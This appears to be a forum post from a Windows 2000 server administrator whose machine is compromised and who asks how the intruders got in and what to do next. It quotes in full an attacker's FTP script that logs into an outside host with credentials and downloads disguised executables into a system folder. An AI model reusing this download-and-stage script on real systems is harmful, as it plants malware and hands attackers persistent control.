I am running windows 2k adv server, running iis , cold fusion, sql server 2k, zone alarm file, netopia cayman 5300 series router and remote admin. I just noticed a file C:\\MSSQL_Script.txt which is requesting ftp access to download some malicious file.. My Questions
I rebuilt my PC from a backup but the file just re-appeared again.
1) Does any know how they might have gotten in. i only have port 80,443,20,21 opened 2) how do hacker schedule jobs. Cos i didn notice a recp.exe program requesting access also. 3) Can some help with the next steps i need to take.Thanks
content of file
open ftp.cybton.com USER mkeoma uvrlSN USER mkeoma uvrlSN binary get /mowl/MSIntskmngr.exe C:\\winnt\\system32\\driver\\MSIntskmngr.exe get /mowl/mspaintfixd.tmp C:\\winnt\\system32\\driver\\mspaintfixd.tmp get /mowl/net.exe C:\\winnt\\system32\\driver\\net.exe get /mowl/notepadc.xcl C:\\winnt\\system32\\driver\\notepadc.xcl quit open ftp.cybton.com USER eazy VEDgFT binary get /mowl/MSIntskmngr.exe C:\\winnt\\system32\\driver\\MSIntskmngr.exe get /mowl/mspaintfixd.tmp C:\\winnt\\system32\\driver\\mspaintfixd.tmp get /mowl/net.exe C:\\winnt\\system32\\driver\\net.exe get /mowl/notepadc.xcl C:\\winnt\\system32\\driver\\notepadc.xcl quit